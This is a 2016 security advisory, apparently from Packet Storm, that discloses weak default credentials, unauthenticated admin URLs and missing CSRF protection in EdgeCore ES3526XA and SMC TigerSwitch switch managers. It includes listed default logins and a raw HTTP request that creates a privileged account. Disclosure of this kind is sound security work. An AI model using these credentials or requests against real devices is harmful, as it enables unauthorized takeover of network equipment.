exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

EdgeCore ES3526XA Manager CSRF / Access Bypass / Weak Credentials

EdgeCore ES3526XA Manager CSRF / Access Bypass / Weak Credentials
Posted Jun 23, 2016
Authored by Karn Ganeshen

EdgeCore ES3526XA Manager suffers from weak credential, access bypass, and cross site request forgery vulnerabilities.

tags | exploit, vulnerability, bypass, csrf
SHA-256 | 4c554624c94b5f4cf21ee4495b9c4e0f66a5180eb79df24623c95cf9103237bc

EdgeCore ES3526XA Manager CSRF / Access Bypass / Weak Credentials

Change Mirror Download
*EdgeCore - Layer2+ Fast Ethernet Standalone Switch ES3526XA Manager -
Multiple Vulnerabilities*
Also rebranded as: *SMC TigerSwitch 10/100 SMC6128L2 Manager*

Object ID:
1.3.6.1.4.1.259.8.1.5

Switch Information
________________________________________
Main Board:
Number of Ports 26
Hardware Version R01
Management Software:
Loader Version 1.0.0.2
Boot-ROM Version 1.0.0.5
Operation Code Version 1.28.16.14

Object ID:
1.3.6.1.4.1.202.20.66

Switch Information
________________________________________
Main Board:
Number of Ports 28
Hardware Version R01
Chip Device ID Marvell 98DX106-B0, 88E6095[F]
Internal Power Status Active

Management Software:
EPLD Version 0.07
Loader Version 1.0.2.0
Boot-ROM Version 1.2.0.1
Operation Code Version 1.4.18.2
Role Master

Other firmware / software versions may also be affected.

*Vendor Response*: These models are no longer supported.

*Vulnerability Details*

*1. Weak Credentials Management *

Guest / guest – priv 0 - read privileges to most device configuration
Admin/admin – priv 15 - read/write access

*Issue:*
Mandatory password change not enforced by the application.

*2. Access Control Flaws*

Any functions can be performed by directly calling the function URL
(GET/POST) without any authentication. This includes creating new
privileged user(s), changing (admin) passwords, deleting user(s),
reading/changing device configuration, rebooting device etc.

+ Guest can also perform any administrative functions such as
add,update,delete users

*PoC 1:*
For example, anyone can access these urls directly, without any
authentication:

http://IP/config/153/sysinfo.htm?unit=1
http://IP/config/153/port_config.htm?unit=
http://IP/home/153/active_panel_bid0.htm?unit=1
http://IP/config/upnp_config.htm
http://IP/config/153/user_accounts.htm

*PoC 2:*
Create a new privileged account:

POST /config/153/user_accounts.htm HTTP/1.1
Host: IP
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/43.0.2357.130 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://IP/config/153/user_accounts.htm
Cookie: expires=Fri, 1 Jan 2016 01:33:07 GMT
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 166

page=userAccount&actionType=Add&sel_account=guest&txt_user_name=guest1&sel_access_level=15&pswd=guest1&pswd_confirm=guest1&txt_user_name2=&passwd_new=&passwd_confirm=

*Issue:*
Application does not enforce access control correctly.

*3. Vulnerable to Cross-Site Request Forgery *

There is no CSRF Token generated per page and / or per (sensitive)
function. Successful exploitation of this vulnerability can allow silent
execution of unauthorized actions on the device such as password change,
configuration parameter changes, saving modified configuration, & device
reboot.

+++++


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close